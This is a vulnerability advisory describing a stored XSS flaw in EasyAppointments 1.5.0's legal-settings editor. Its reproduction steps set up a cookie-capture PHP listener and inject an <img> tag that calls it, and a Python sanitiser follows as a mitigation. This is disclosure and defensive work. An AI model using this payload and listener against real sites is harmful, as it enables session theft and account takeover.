EasyAppointments 1.5.0 | Stored XSS leads to account takeover
Information
| Field | Value |
|---|---|
| Software Type | Web App |
| Software Name | EasyAppointments |
| Affected Version | 1.5.0 |
| Software Vendor | Alex Tselegidis |
| Software Link | https://github.com/alextselegidis/easyappointments |
| Severity | Medium |
| CVSS Score | 6.6 |
| CVE Link | https://www.cve.org/CVERecord?id=CVE-2024-57601 |
| Affected Assets | 1293+ |
| Date of Discovery | Dec 22nd, 2024 |
| PoC Exploit | https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd |
Description
The `/index.php/legal_settings` endpoint has three fields for custom policies, such as a cookie policy.
The problem is that the HTML entered here is executed whenever the page loads. Most editors only run embedded code when the content is displayed, not while it is being edited; either way, this exposes the site to stored XSS.
Reproduce
To set up a cookie-stealer server, save the following PHP script as `capture.php`:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Start a PHP server to serve it:
```
$ php -S 0.0.0.0:1718
```
1. Log in to the admin panel.
2. Go to `/index.php/legal_settings`.
3. Inside the cookies field, click the embed code option of the text editor.
4. Insert the following: `<img src="http://127.0.0.1:1718/capture.php">`
This will capture cookies every time the legal settings page is visited.
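As an added mitigation example (not part of this advisory or of the EasyAppointments code base), the following Python allowlist sanitiser shows how rich-text policy fields can be filtered before storage or rendering so that embedded `<img>`, `<script>` and event-handler attributes never reach the page; the tag and attribute lists are assumptions chosen for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist for a legal-policy editor: basic formatting plus plain links.
ALLOWED_TAGS = {"p", "br", "strong", "em", "ul", "ol", "li", "h2", "h3", "a"}
ALLOWED_ATTRS = {"a": {"href"}}                 # never style, src or on* handlers
SAFE_SCHEMES = {"http", "https", "mailto", ""}  # "" means a relative URL


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.stack = [], []

    def _safe_href(self, value):
        # Browsers ignore embedded tabs/newlines, so strip them before checking
        cleaned = value.strip().replace("\t", "").replace("\n", "").replace("\r", "")
        return urlparse(cleaned).scheme in SAFE_SCHEMES  # rejects javascript:, data:

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # <img>, <script>, <iframe>, ... are dropped; their text remains
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and value is not None:
                if name == "href" and not self._safe_href(value):
                    continue
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag != "br":
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:  # close everything up to the matching open tag
            while (top := self.stack.pop()) != tag:
                self.out.append(f"</{top}>")
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # text is always re-escaped


def sanitize_policy_html(raw: str) -> str:
    s = _Sanitizer()
    s.feed(raw)
    s.close()
    while s.stack:  # close anything the input left open
        s.out.append(f"</{s.stack.pop()}>")
    return "".join(s.out)
```

The payload from the steps above comes out as `<p>Cookies</p>` with the image tag removed; applying the same filter on output as well as on save also neutralises content that was stored before the fix.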
Proof of Concept (PoC) Video
Posted on: January 11, 2025 12:06 AM